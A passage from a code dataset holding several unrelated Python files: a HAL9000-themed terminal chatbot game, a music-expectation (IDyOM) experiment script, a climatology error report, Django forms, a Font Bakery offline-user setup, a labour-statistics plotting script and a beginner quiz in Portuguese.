['I do not want me to be %1. I just want you to do what I like',\n 'I am not %1. You are my only toy, I want you to be happy']),\n\n (r'You are [\\w\\s]+',\n ['Thank you! Now press the big red button',\n 'I think you are right! But I need you to push the red button']),\n\n (r'Are you ([\\w\\s]+)\\?',\n [\"Why would you think I am %1?\",\n \"Would you like me to be %1?\"]),\n\n (r'Because[\\w\\s]*',\n ['That is fine but I need you to push the red button',\n 'I do not think you are right.']),\n\n (r'',\n [\"Can you press the red button, please?\",\n \"Have you tried turning it off and on again?\",\n \"Help me, please! The red button!\"])]\n\nclass HAL9000(object):\n \n def __init__(self, terminal):\n \"\"\"Constructor for the agent, stores references to systems and initializes internal memory.\n \"\"\"\n self.terminal = terminal\n self.location = 'unknown'\n self.isFirstInput = True\n self.chatbot = chat.Chat(AGENT_RESPONSES, chat.reflections)\n self.speech = speech.SpeechMixin()\n self.speech.onMessage = self.onMessage\n self.speech.log = self.onSpeechLog\n\n def onSpeechLog(self, text):\n print(text)\n #self.terminal.log(text, align='right', color='#00805A')\n\n def onMessage(self, source, message):\n self.terminal.log(message, align='left')\n self.respond(message)\n\n def on_input(self, evt):\n \"\"\"Called when user types anything in the terminal, connected via event.\n \"\"\"\n self.respond(evt.text)\n \n def respond(self, text):\n if self.isFirstInput:\n answer = \"Hello! This is HAL.\"\n self.isFirstInput = False\n\n elif text == \"Where am I?\":\n answer = 'You are in the {}.'.format(self.location)\n\n else:\n answer = self.chatbot.respond(text)\n\n self.terminal.log(answer, align='right', color='#00805A')\n self.speech.speak_message = answer\n\n def on_command(self, evt):\n \"\"\"Called when user types a command starting with `/` also done via events.\n \"\"\"\n if evt.text == 'quit' or evt.text == 'yes':\n vispy.app.quit()\n\n elif evt.text.startswith('relocate'):\n self.location = evt.text[9:]\n self.terminal.log('', align='center', color='#404040')\n self.terminal.log('\\u2014 Now in the {}. \\u2014'.format(self.location), align='center', color='#404040')\n\n elif evt.text.startswith('push '):\n self.terminal.log('ATTENTION', align='center', color='#FF0000')\n self.terminal.log('You decided to push the {}'.format(evt.text[5:]), align='right', color='#00805A')\n self.terminal.log('This may cause the end of the game', align='right', color='#00805A')\n self.terminal.log('Are you sure (type /yes or /no)?', align='right', color='#00805A')\n\n elif evt.text.startswith('no'):\n self.terminal.log('GOOD CHOICE', align='center', color='#005500')\n\n else:\n self.terminal.log('Command `{}` unknown.'.format(evt.text), align='left', color='#ff3000') \n self.terminal.log(\"I'm afraid I can't do that.\", align='right', color='#00805A')\n\n def update(self, _):\n \"\"\"Main update called once per second via the timer.\n \"\"\"\n pass\n\n\nclass Application(object):\n \n def __init__(self):\n # Create and open the window for user interaction.\n self.window = window.TerminalWindow()\n\n # Print some default lines in the terminal as hints.\n self.window.log('Operator started the chat.', align='left', color='#808080')\n self.window.log('HAL9000 joined.', align='right', color='#808080')\n\n # Construct and initialize the agent for this simulation.\n self.agent = HAL9000(self.window)\n\n # Connect the terminal's existing events.\n self.window.events.user_input.connect(self.agent.on_input)\n self.window.events.user_command.connect(self.agent.on_command)\n\n def run(self):\n timer = vispy.app.Timer(interval=1.0)\n timer.connect(self.agent.update)\n timer.start()\n \n vispy.app.run()\n\n\nif __name__ == \"__main__\":\n vispy.set_log_level('WARNING')\n vispy.use(app='glfw')\n \n app = Application()\n app.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"31758816","text":"\"\"\"\nEnter point of the program.\n\"\"\"\nfrom idyom import idyom\nfrom idyom import data\nfrom lisp import parser as lisp\nfrom idyom import jumpModel\n\nfrom optparse import OptionParser\nfrom glob import glob\nfrom tqdm import tqdm\nimport unittest\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pickle\nimport time\nimport scipy.io as sio\n\n\nSERVER = False\n\ndef comparePitches(list1, list2, k=0.9):\n\t\"\"\"\n\tCompare two list of pitches, with a criterion k\n\t\"\"\"\n\tscore = 0\n\n\tfor i in range(min(len(list1), len(list2))):\n\t\tscore += list1[i] == list2[i]\n\n\tif score > int(k*min(len(list1), len(list2))):\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef checkDataSet(folder):\n\t\"\"\"\n\tFunction that check if the dataset is corrupted (contains duplicates).\n\t\"\"\"\n\n\tfiles = []\n\tfor filename in glob(folder + '/**', recursive=True):\n\t\tif filename[filename.rfind(\".\"):] in [\".mid\", \".midi\"]:\n\t\t\tfiles.append(filename)\n\n\tD = data.data(deleteDuplicates=False)\n\tD.addFiles(files)\n\tDATA = D.getData(\"pitch\")\n\n\tdelete = []\n\tdelete_pitches = []\n\n\tfor i in range(len(files)):\n\t\tfor j in range(i, len(files)):\n\t\t\tif i != j and comparePitches(DATA[i], DATA[j]):\n\n\t\t\t\tprint(files[i], \"matches\", files[j])\n\n\n\t\t\t\t# We recommand to delete the smallest one\n\t\t\t\tif len(DATA[i]) > len(DATA[j]):\n\t\t\t\t\tfor d in delete_pitches:\n\t\t\t\t\t\tif comparePitches(d, DATA[i]):\n\t\t\t\t\t\t\tdelete.append(files[i])\n\t\t\t\t\t\t\tdelete_pitches.append(DATA[i])\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tdelete.append(files[j])\n\t\t\t\t\tdelete_pitches.append(DATA[j])\n\t\t\t\telse:\n\t\t\t\t\tfor d in delete_pitches:\n\t\t\t\t\t\tif comparePitches(d, DATA[j]):\n\t\t\t\t\t\t\tdelete.append(files[j])\n\t\t\t\t\t\t\tdelete_pitches.append(DATA[j])\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tdelete.append(files[i])\n\t\t\t\t\tdelete_pitches.append(DATA[i])\t\t\t\n\n\tif len(delete) > 0:\n\t\tprint(\"We recommand you to delete the following files because they are duplicates:\")\n\t\tprint(list(set(delete)))\n\telse:\n\t\tprint(\"We did not find any duplicates.\")\n\ndef replaceinFile(file, tochange, out):\n\ts = open(file).read()\n\ts = s.replace(tochange, out)\n\tf = open(file, \"w\")\n\tf.write(s)\n\tf.close()\n\ndef cross_validation(folder, k_fold=10, maxOrder=20, quantization=24, jump=False):\n\t\"\"\"\n\n\t\"\"\"\n\n\tnp.random.seed(0)\n\n\tLikelihoods = []\n\n\tfiles = []\n\tfor filename in glob(folder + '/**', recursive=True):\n\t\tif filename[filename.rfind(\".\"):] in [\".mid\", \".midi\"]:\n\t\t\tfiles.append(filename)\n\n\tnp.random.shuffle(files)\n\n\tk_fold = len(files) // int(k_fold)\n\n\tvalidationFiles = []\n\n\tfor i in range(len(files)//k_fold):\n\t\ttrainData = files[:i*k_fold] + files[(i+1)*k_fold:]\n\t\tevalData = files[i*k_fold:(i+1)*k_fold]\n\n\t\t# Our IDyOM\n\t\tL = idyom.idyom(maxOrder=maxOrder, jump=jump)\n\t\tM = data.data(quantization=quantization)\n\t\tM.addFiles(trainData)\n\t\tL.train(M)\n\n\t\tfor file in evalData:\n\t\t\tLikelihoods.append(np.mean(L.getLikelihoodfromFile(file)))\n\t\t\tvalidationFiles.append(file)\n\n\treturn Likelihoods, validationFiles\n\n\ndef compareLikelihoods(x1, x2):\n\n\tplt.title(\"Likelihoods over pieces\")\n\tplt.xlabel(\"pieces\")\n\tplt.ylabel(\"likelihood\")\n\tax = plt.subplot(111)\n\n\tfor i in range(len(x1)):\n\t\tax.bar(i-0.2, x1[i], width=0.2, color='b', align='center')\n\t\tax.bar(i, x2[i], width=0.2, color='g', align='center')\n\n\tif not SERVER:\n\t\tplt.show()\n\telse:\n\t\tplt.savefig(\"figs/server/compareLikelihoods.eps\")\n\t\tplt.close()\n\n\tplt.title(\"Likelihood diferences over pieces\")\n\tplt.xlabel(\"pieces\")\n\tplt.ylabel(\"likelihood diference (idyom - jump)\")\n\tplt.plot(np.array(x1)-np.array(x2))\n\tplt.plot(np.zeros(len(x1)))\n\n\tif not SERVER:\n\t\tplt.show()\n\telse:\n\t\tplt.savefig(\"figs/server/likelohoodDifferences.eps\")\n\t\tplt.close()\n\ndef compareJump(folder, k_fold=2):\n\t\"\"\"\n\tCompare the likelihood between idyom model and jump model.\n\t\"\"\"\n\t# if os.path.isfile(\".IDyOM.save\"):\n\t# \tlikelihood1, files1 = pickle.load(open(\".IDyOM.save\", 'rb'))\n\t# \tprint(\"We loaded idyom model from pickle.\")\n\t# else:\n\t# \tprint(\"We store idyom model for later.\")\n\t# \tlikelihood1, files1 = cross_validation(folder, k_fold=k_fold, jump=False)\n\t# \tpickle.dump((likelihood1, files1), open(\".IDyOM.save\", 'wb'))\n\t\n\n\tlikelihood1, files1 = cross_validation(folder, k_fold=k_fold, jump=False)\n\tlikelihood2, files2 = cross_validation(folder, k_fold=k_fold, jump=True)\n\n\tplt.ylabel(\"Likelihood\")\n\tplt.bar([0, 1], [np.mean(likelihood1), np.mean(likelihood2)], color=\"b\", yerr=[1.96*np.std(likelihood1)/np.sqrt(len(likelihood1)), 1.96*np.std(likelihood2)/np.sqrt(len(likelihood2))])\n\t\n\tif not SERVER:\n\t\tplt.show()\n\telse:\n\t\tplt.savefig(\"figs/server/JUMPCompare.eps\")\n\t\tplt.close()\n\n\tprint(\"IDyOM\")\n\tprint(\"Mean:\", np.mean(likelihood1))\n\tprint(\"Std:\", np.std(likelihood1))\n\n\tprint(\"JUMP\")\n\tprint(\"Mean:\", np.mean(likelihood2))\n\tprint(\"Std:\", np.std(likelihood2))\n\n\tM = data.data()\n\tM.parse(folder)\n\tdat1, files3 = M.getScoresFeatures()\n\n\tdico = dict(zip(files1, likelihood1))\n\n\tdico2 = dict(zip(files2, likelihood2))\n\n\tx1 = []\n\tx2 = []\n\n\tfor file in files1:\n\t\tif file in dico2 and dico[file] is not None and dico2[file] is not None:\n\t\t\tx1.append(dico[file])\n\t\t\tx2.append(dico2[file])\n\n\tcompareLikelihoods(x1, x2)\n\n\n\tweights = []\n\n\tfor file in files3:\n\t\tif file in dico and dico[file] is not None :\n\t\t\tweights.append(500*dico[file]**2)\n\t\telse:\n\t\t\tweights.append(0)\n\n\n\tplt.subplot(2, 1, 1)\n\n\tplt.scatter(dat1[0][:len(dat1[1])],dat1[1], s=weights)\n\n\tplt.title('IDyOM')\n\tplt.xlabel('Average 1-note interval')\n\tplt.ylabel('Average note onset')\n\n\n\tdat2, files4 = M.getScoresFeatures()\n\n\tdico = dict(zip(files2, likelihood2))\n\n\tweights = []\n\n\tfor file in files4:\n\t\tif file in dico and dico[file] is not None :\n\t\t\tweights.append(500*dico[file]**2)\n\t\telse:\n\t\t\tweights.append(0)\n\n\n\tplt.subplot(2, 1, 2)\n\t\n\tplt.scatter(dat2[0][:len(dat2[1])],dat2[1], s=weights)\n\n\tplt.title('JUMP')\n\tplt.xlabel('Average 1-note interval')\n\tplt.ylabel('Average note onset')\n\n\tif not SERVER:\n\t\tplt.show()\n\telse:\n\t\tplt.savefig(\"figs/server/scoreSpace.eps\")\n\t\tplt.close()\n\ndef plotLikelihood(folder, k_fold=2):\n\t\"\"\"\n\tCompare the likelihood between idyom model and jump model.\n\t\"\"\"\n\n\tlikelihood1, files = cross_validation(folder, k_fold=k_fold, jump=True)\n\n\tprint(likelihood1)\n\tprint(files)\n\n\tplt.ylabel(\"Likelihood\")\n\tplt.bar([0], [np.mean(likelihood1)], color=\"b\", yerr=[np.std(likelihood1)])\n\tplt.show()\n\n\tprint()\n\tprint()\n\tprint()\n\n\tprint(\"Mean:\", np.mean(likelihood1))\n\tprint(\"Std:\", np.std(likelihood1))\n\n\tM = data.data()\n\tM.parse(folder)\n\tdat, files2 = M.getScoresFeatures()\n\n\tdico = dict(zip(files, likelihood1))\n\n\tweights = []\n\n\tfor file in files2:\n\t\tif file in dico:\n\t\t\tweights.append(500*dico[file]**2)\n\t\telse:\n\t\t\tweights.append(0)\n\n\n\tplt.scatter(dat[0][:len(dat[1])],dat[1], s=weights)\n\n\tplt.title('Database')\n\tplt.xlabel('Average 1-note interval')\n\tplt.ylabel('Average note onset')\n\n\tplt.show()\n\ndef compareWithLISP(folder):\n\t\"\"\"\n\tStart comparisons between our idyom and the one in lisp.\n\tThis function, will add the dataset to lisp, and start training.\n\tYou should have lisp and idyom already installed.\n\t\"\"\"\n\n\t# if not os.path.exists(\"lisp/midis/\"):\n\t# \tos.makedirs(\"lisp/midis/\")\n\n\t# os.system(\"rm -rf lisp/midis/*\")\n\n\t# # Add folder to lisp database\n\n\t# replaceinFile(\"lisp/compute.lisp\", \"FOLDER\", folder)\n\n\t# # Compute with LISP IDyOM\n\n\t# os.system(\"sbcl --noinform --load lisp/compute.lisp\")\n\n\t# replaceinFile(\"lisp/compute.lisp\", folder, \"FOLDER\")\n\n\n\tfolder = \"lisp/midis/\"\n\t#folder = \"dataset/bach_sub/\"\n\n\t# Our IDyOM\n\tnow = time.time()\n\tlikelihoods1, _ = cross_validation(folder, maxOrder=20, quantization=6, k_fold=2)\n\tprint(\"execution:\", time.time()-now)\n\n\t# LISP version\n\n\tL2 = lisp.getDico(\"lisp/12-cpitch_onset-cpitch_onset-nil-nil-melody-nil-10-both-nil-t-nil-c-nil-t-t-x-3.dat\")\n\n\tlikelihood2 = lisp.getLikelihood(L2)\n\n\tplt.ylabel(\"Likelihood\")\n\tplt.bar([0, 1], [np.mean(likelihoods1), likelihood2[0]], color=\"b\", yerr=[1.96*np.std(likelihoods1)/np.sqrt(len(likelihoods1)), 1.96*likelihood2[1]/np.sqrt(likelihood2[2])])\n\tplt.show()\n\n\n\t# LATER \n\tquit()\n\tplt.ylabel(\"Likelihood\")\n\tplt.xlabel(\"time\")\n\tplt.plot(L2['1'][\"probability\"])\n\tplt.plot(L.getLikelihoodfromFile(folder+L2['1'][\"melody.name\"][0][1:-1] + \".mid\"))\n\tplt.show()\n\n\ndef Train(folder, jump=False):\n\n\tL = idyom.idyom(jump=jump, maxOrder=100)\n\tM = data.data(quantization=24)\n\tM.parse(folder)\n\tL.train(M)\n\n\tL.save(\"models/jump_\"+str(jump)+\".model\")\n\ndef LikelihoodOverFolder(folder, jump=False, zero_padding=True):\n\tL = idyom.idyom(jump=jump)\n\n\tif os.path.isfile(\"models/jump_\"+str(jump)+\".model\"):\n\t\tprint(\"We load saved model.\")\n\t\tL.load(\"models/jump_\"+str(jump)+\".model\")\n\telse:\n\t\tprint(\"No saved model found, please train before.\")\n\n\tS, files = L.getSurprisefromFolder(folder)\n\n\tdata = {}\n\n\tfor i in range(len(S)):\n\t\tname = files[i][files[i].rfind(\"/\")+1:files[i].rfind(\".\")]\n\t\tdata[name] = np.array(S[i])\n\n\tif not os.path.exists(folder+\"surprises\"):\n\t\tos.makedirs(folder+\"surprises\")\n\n\tsio.savemat(folder+'surprises/surpriseSignal_jump_'+str(jump)+'.mat', data)\n\tpickle.dump(data, open(folder+'surprises/surpriseSignal_jump_'+str(jump)+'.pickle', \"wb\" ) )\n\n\tprint()\n\tprint()\n\tprint()\n\tprint(\"Data have been succesfully saved in:\", folder+'jump_'+str(jump)+'.mat')\n\tprint(\"Including a .mat for matlab purpose and a .pickle for python purpose.\")\n\tprint()\n\tprint()\n\n\tif not SERVER:\n\t\tfor i in range(len(S)):\n\t\t\tplt.title(files[i])\n\t\t\tplt.plot(S[i])\n\t\t\tplt.show()\n\t\t\t#print(S[i])\n\ndef main():\n\t\"\"\"\n\tCall this method to easily use the program.\n\t\"\"\"\n\n\tpass\n\nif __name__ == \"__main__\":\n\n\tusage = \"usage %prog [options]\"\n\tparser = OptionParser(usage)\n\n\t# parser.add_option(\"-t\", \"--test\", type=\"int\",\n\t# \t\t\t\t help=\"1 if you want to launch unittests\",\n\t# \t\t\t\t dest=\"tests\", default=0)\n\n\t# parser.add_option(\"-o\", \"--opti\", type=\"string\",\n\t# \t\t\t\t help=\"launch optimisation of hyper parameters on the passed dataset\",\n\t# \t\t\t\t dest=\"hyper\", default=\"\")\n\n\t# parser.add_option(\"-c\", \"--check\", type=\"string\",\n\t# \t\t\t\t help=\"check the passed dataset\",\n\t# \t\t\t\t dest=\"check\", default=\"\")\n\n\t# parser.add_option(\"-g\", \"--generate\", type=\"int\",\n\t# \t\t\t\t help=\"generate piece of the passed length\",\n\t# \t\t\t\t dest=\"generate\", default=0)\n\n\t# parser.add_option(\"-s\", \"--surprise\", type=\"string\",\n\t# \t\t\t\t help=\"return the surprise over a given dataset\",\n\t# \t\t\t\t dest=\"surprise\", default=\"\")\n\n\t# parser.add_option(\"-l\", \"--lisp\", type=\"string\",\n\t# \t\t\t\t help=\"plot comparison with the lisp version\",\n\t# \t\t\t\t dest=\"lisp\", default=\"\")\n\n\t# parser.add_option(\"-j\", \"--jump\", type=\"string\",\n\t# \t\t\t\t help=\"plot comparison with the jump\",\n\t# \t\t\t\t dest=\"jump\", default=\"\")\n\n\t# parser.add_option(\"-p\", \"--plot\", type=\"string\",\n\t# \t\t\t\t help=\"plot likelihood of idyom model\",\n\t# \t\t\t\t dest=\"plot\", default=\"\")\n\n\t# parser.add_option(\"-k\", \"--k_fold\", type=\"int\",\n\t# \t\t\t help=\"set the value of k for cross validation\",\n\t# \t\t\t dest=\"k\", default=None)\n\n\tparser.add_option(\"-a\", \"--ajump\", type=\"string\",\n\t\t\t\t\t help=\"plot comparison with the jump\",\n\t\t\t\t\t dest=\"ajump\", default=\"\")\n\n\tparser.add_option(\"-t\", \"--train\", type=\"string\",\n\t\t\t\t help=\"Train the model with the passed folder\",\n\t\t\t\t dest=\"train_folder\", default=None)\n\n\tparser.add_option(\"-j\", \"--jump\", type=\"int\",\n\t\t\t\t help=\"Use JUMP model as LTM is 1 is passed\",\n\t\t\t\t dest=\"jump\", default=1)\n\n\tparser.add_option(\"-l\", \"--likelihood\", type=\"string\",\n\t\t\t\t help=\"Compute likelihoods over the passed folder\",\n\t\t\t\t dest=\"trial_folder\", default=None)\n\n\tparser.add_option(\"-z\", \"--zero_padding\", type=\"int\",\n\t\t\t\t help=\"Specify if you want to use zero padding in the surprise output (1 by default)\",\n\t\t\t\t dest=\"zero_padding\", default=1)\n\n\tparser.add_option(\"-p\", \"--lisp\", type=\"string\",\n\t\t\t\t\t help=\"plot comparison with the lisp version\",\n\t\t\t\t\t dest=\"lisp\", default=\"\")\n\n\toptions, arguments = parser.parse_args()\n\n\n\tif options.train_folder is not None:\n\t\tTrain(options.train_folder, jump=options.jump==1)\n\n\tif options.trial_folder is not None:\n\t\tLikelihoodOverFolder(options.trial_folder, jump=options.jump==1, zero_padding=options.zero_padding==1)\n\n\tif options.ajump != \"\":\t\n\t\tcompareJump(options.ajump)\n\n\tif options.lisp != \"\":\t\n\t\tcompareWithLISP(options.lisp)\n\t\n\t# if options.tests == 1:\n\t# \tloader = unittest.TestLoader()\n\n\t# \tstart_dir = \"unittests/\"\n\t# \tsuite = loader.discover(start_dir)\n\n\t# \trunner = unittest.TextTestRunner()\n\t# \trunner.run(suite)\n\n\t# if options.hyper != \"\":\n\t# \tL = idyom.idyom(maxOrder=30)\n\n\t# \tL.benchmarkQuantization(options.hyper,train=0.8)\n\t# \tL.benchmarkOrder(options.hyper, 24, train=0.8)\n\n\t# if options.check != \"\":\n\t# \tcheckDataSet(options.check)\n\n\t# if options.generate != 0:\t\t\n\t# \tL = idyom.idyom(maxOrder=30)\n\t# \tM = data.data(quantization=6)\n\t# \t#M.parse(\"../dataset/\")\n\t# \tM.parse(\"dataset/\")\n\t# \tL.train(M)\n\t# \ts = L.generate(int(options.generate))\n\t# \ts.plot()\n\t# \ts.writeToMidi(\"exGen.mid\")\n\n\t# if options.jump != \"\":\t\t\n\t# \tcompareJump(options.jump)\n\n\t# if options.surprise != \"\":\n\t# \tL = idyom.idyom(maxOrder=30)\n\t# \tM = data.data(quantization=6)\n\t# \t#M.parse(\"../dataset/\")\n\t# \tM.parse(\"dataset/\")\n\t# \tL.train(M)\n\n\t# \tS = L.getSurprisefromFile(options.surprise, zero_padding=True)\n\n\t# \tplt.plot(S)\n\t# \tplt.xlabel(\"Time in quantization step\")\n\t# \tplt.ylabel(\"Expected surprise (-log2(p))\")\n\t# \tplt.show()\n\n\t# \tprint(S)\n\n\t# if options.lisp != \"\":\t\t\n\t# \tcompareWithLISP(options.lisp)\n\n\t# if options.plot != \"\":\n\t# \tif options.k is None:\t\t\n\t# \t\tplotLikelihood(options.plot)\n\t# \telse:\n\t# \t\tplotLikelihood(options.plot, k_fold=options.k)\n\n","sub_path":"App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":13232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"372189089","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n#This script compares climatologies obtained from extrapolation with measured climatologies\n#Results .zsvd files must be in a folder named \"results\"\n#Measurement .zsvd files must be in a folder named \"measurements\"\n\n#-------------------------------Compares climatologies\n\n\nimport os, sys\nfrom toto_Tools import askPath, sortEntities\nfrom toto_GetData import get_zsvd\nfrom toto_CalcErrors import calcEntRMSD\n\n\nprint(\"\\n\",sys.version)\nprint(\"The current path is {}\\n\".format(os.path.abspath(__file__)))\n\npath = askPath(\"Please enter the path of the directory containing the time series to compare.\"\\\n+\"\\nThese time series have to be organized in two subdirectories named measurements and results.\\n\")\n\n\npathMes = path + \"measurements/\"\npathRes = path + \"results/\"\ntabMes=[] #table containing measurements tables\ntabRes=[] #table containing results tables\n\nfor element in os.listdir(pathMes):\n if element.endswith('.zsvd'): #finding climatology files\n tabMes.append(get_zsvd(pathMes+element)) #Acquisition of measurements data\n\nfor element in os.listdir(pathRes):\n if element.endswith('.zsvd'): #finding climatology files\n tabRes.append(get_zsvd(pathRes+element)) #Acquisition of results data\n \n#Matching Entities between them\ntabRes = sortEntities(tabRes,tabMes)\n\n# Calculating errors\ncount, length, sumRMSD, maxRMSD, maxRMSD_loc, emax, emax_loc = calcEntRMSD(tabRes,tabMes)\n \n# writing calculated errors\n\nf = open(\"Reports/accuracy_report.txt\",\"w\") \n\nt = \"Analyse executed in folder : {}\".format(path)\nprint(t);f.write(t+\"\\n\")\n\nnpheno = len(tabRes[0].series)\nfor j in range(npheno): \n if tabRes[0].series[j].name!=\"Turbulent Intensity Variation (-)\":\n #avoid TI Variation (too close to 0) \n t =(\"\\n{}. Differences in {}:\\n\".format(j,tabRes[0].series[j].name))\n print(t);f.write(t+\"\\n\")\n t=\"Entities analysed: {}\".format(count)\n print(t);f.write(t+\"\\n\")\n t=\"Total number of values : {}\".format(length)\n print(t);f.write(t+\"\\n\")\n t=\"mean RMSE: {:.2E}\".format(sumRMSD[j]/count)\n print(t);f.write(t+\"\\n\")\n t=\"max RMSE: {:.2E} ({})\".format(maxRMSD[j],maxRMSD_loc[j])\n print(t);f.write(t+\"\\n\")\n t=\"max error: {:.2E} ({},line {})\".format(emax[j][0],emax_loc[j],emax[j][1]+1)\n print(t);f.write(t+\"\\n\")\n \nf.close()\n","sub_path":"accuracy.py","file_name":"accuracy.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"522285239","text":"from django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\nfrom .models import User, Customer, Comment, Review\nfrom django import forms\nfrom string import Template\nfrom django.utils.safestring import mark_safe\nfrom django.forms import ImageField\n\nclass SignUpForm(UserCreationForm):\n class Meta:\n model = User\n fields = ('email','first_name','last_name','username')\n\n\nclass UserUpdateForm(forms.ModelForm):\n\n class Meta:\n model = User\n fields = ['username', 'first_name','last_name','email']\n widgets = {\n 'username': forms.TextInput(attrs={'class':'form-control'}),\n 'first_name': forms.TextInput(attrs={'class':'form-control'}),\n 'last_name': forms.TextInput(attrs={'class':'form-control'}),\n 'email': forms.EmailInput(attrs={'class':'form-control'}),\n }\n\n help_texts = {\n 'username': None,\n }\n\nclass PictureWidget(forms.widgets.FileInput):\n def render(self, name, value, attrs=None, **kwargs):\n input_html = super().render(name, value, attrs={\"id\": \"id_avatar\"}, **kwargs)\n img_html = mark_safe(f'

')\n return f'{img_html}{input_html}'\n\n\nclass CustomerUpdateForm(forms.ModelForm):\n avatar = forms.ImageField(widget=PictureWidget)\n\n class Meta:\n model = Customer\n fields = ['avatar', 'address', 'phone_number']\n widgets = {\n 'address': forms.TextInput(attrs={'class':'form-control'}),\n 'phone_number': forms.TextInput(attrs={'class':'form-control'}),\n }\n\nclass CommentForm(forms.ModelForm):\n class Meta:\n model = Comment\n fields = ['content']\n\nclass ReviewForm(forms.ModelForm):\n \"\"\"docstring for ReviewForm\"\"\"\n class Meta:\n model = Review\n fields = ['content', 'vote']\n","sub_path":"foodanddrink/restaurant/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"205804404","text":"# coding: utf-8\n# Copyright 2013 The Font Bakery Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# See AUTHORS.txt for the list of Authors and LICENSE.txt for the License.\n\nimport os\nimport sys\n\nsys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)), '..'))\n\nfrom bakery.app import app, db\n\nctx = app.test_request_context('/')\nctx.push()\n\nfrom bakery.models import User\n\nuser = User.get_or_init(login='offline')\nuser.name = 'Offline User'\nuser.email = 'fake@mail.tldr'\nuser.github_access_token = 'fake'\n\ndb.session.add(user)\ndb.session.commit()\n\nctx.pop()\n\n","sub_path":"scripts/offline.py","file_name":"offline.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"323767620","text":"import requests\nimport json, csv\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n# Metadata specs\nheaders = {'Content-type': 'application/json'}\nlist = ['LNU02070540', 'LNU02071075', 'LNU02071610', 'LNU02070005', 'LNU02081990']\ndata = json.dumps({\"seriesid\": list,\"startyear\":\"2013\", \"endyear\":\"2018\"})\np = requests.post('https://api.bls.gov/publicAPI/v1/timeseries/data/', \\\n\t\t\t\t\tdata=data, headers=headers)\njson_data = json.loads(p.text)\n\n# Write data to file\noutput = open('output.csv','w')\nf = csv.writer(output)\nf.writerow(['SeriesID','Year','Period','Value'])\nfor series in json_data['Results']['series']:\n\tseriesId = series['seriesID']\n\tfor item in series['data']:\n\t\tyear = item['year']\n\t\tperiod = item['period']\n\t\tvalue = item['value']\n\t\tf.writerow([seriesId,year,period,value])\noutput.close()\n\n# Import data\ndf = pd.read_csv('output.csv')\ndict = {\n 'LNU02070540':'Black or African American, both sexes',\n 'LNU02071075':'Asian, both sexes',\n 'LNU02071610':'Hispanic or Latino, both sexes',\n 'LNU02070005':'All Races, women',\n 'LNU02081990':'White, both sexes'\n }\n\t\t\n# Map demographics to dictionary\ndf['Demographic'] = df['SeriesID'].map(dict)\n\n# Plot\nsns.set()\nsns.set_context('talk')\nplt.figure(figsize=(10,6))\nplt.title('US Software Developer Employment', fontsize=18, fontweight='bold')\nax = sns.lineplot(x='Year', y='Value',\n hue='Demographic', style='Demographic',\n palette=sns.color_palette(\"hls\", 5),\n linewidth=2.5, alpha=.75, data=df)\nax.set_ylabel('Percent of Respondents')\nax.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\nplt.xticks(range(2013,2018,1))\nplt.show()\n","sub_path":"BLS_SD_Employment.py","file_name":"BLS_SD_Employment.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"513067855","text":"from time import sleep\ndef len():\n print('=='*40)\nlen()\nprint(' QUESTIONÁRIO SOBRE PYTHON')\nlen()\nscore = 0\nprint('''\nQ-1 O que e Python?\na) Um conjunto de ferramentas de edição\nb) Um jogo\nc) Uma liguagem de programação\n''')\nquestao1 = input().lower()\nif questao1 == 'c':\n print('Resposta certa!')\n score += 1\nelse:\n print('Resposta Incorreta!.')\n\nprint('''\nQ-2 Qual a outra tradução para o nome python?\na) Cobra\nb) Pipa\nc) código\n''')\nquestao2 = input().lower()\nif questao2 == 'a':\n print('Resposta certa!')\n score += 1\nelse:\n print('Resposta Incorreta!.')\n\nprint('''\nQ-3 Qual comando eu uso para importa módulos em Python?\na) int\nb) import\nc) sqrt\n''')\nquestao3 = input().lower()\nif questao3 == 'b':\n print('Resposta certa!')\n score += 1\nelse:\n print('Resposta Incorreta!.')\n\nprint('''\nQ-4 Qual exemplo é um valor boleano?\na) 2.0\nb) 5\nc TRUE / FALSE\n''')\nquestao4 = input().lower()\nif questao4 == 'c':\n print('Resposta certa!')\n score += 1\nelse:\n print('Resposta Incorreta!.')\n\nprint('''\nQ-5 Qual a função para imprima algo na tela?\na) print\nb) float\nc)input\n''')\nquestao5 = input().lower()\nif questao5 == 'a':\n print('Resposta certa!')\n score += 1\nelse:\n print('Resposta Incorreta!.')\nsleep(0.5)\nlen()\nprint('Calculando os pontos...')\nsleep(0.5)\nlen()\nsleep(1)\nprint(f'Sua pontuação foi de {score} pontos. ')\nsleep(1)\n\n\nif score == 5:\n print('Parabéns, continue assim!')\nelse:\n print('Estude mais da próxima 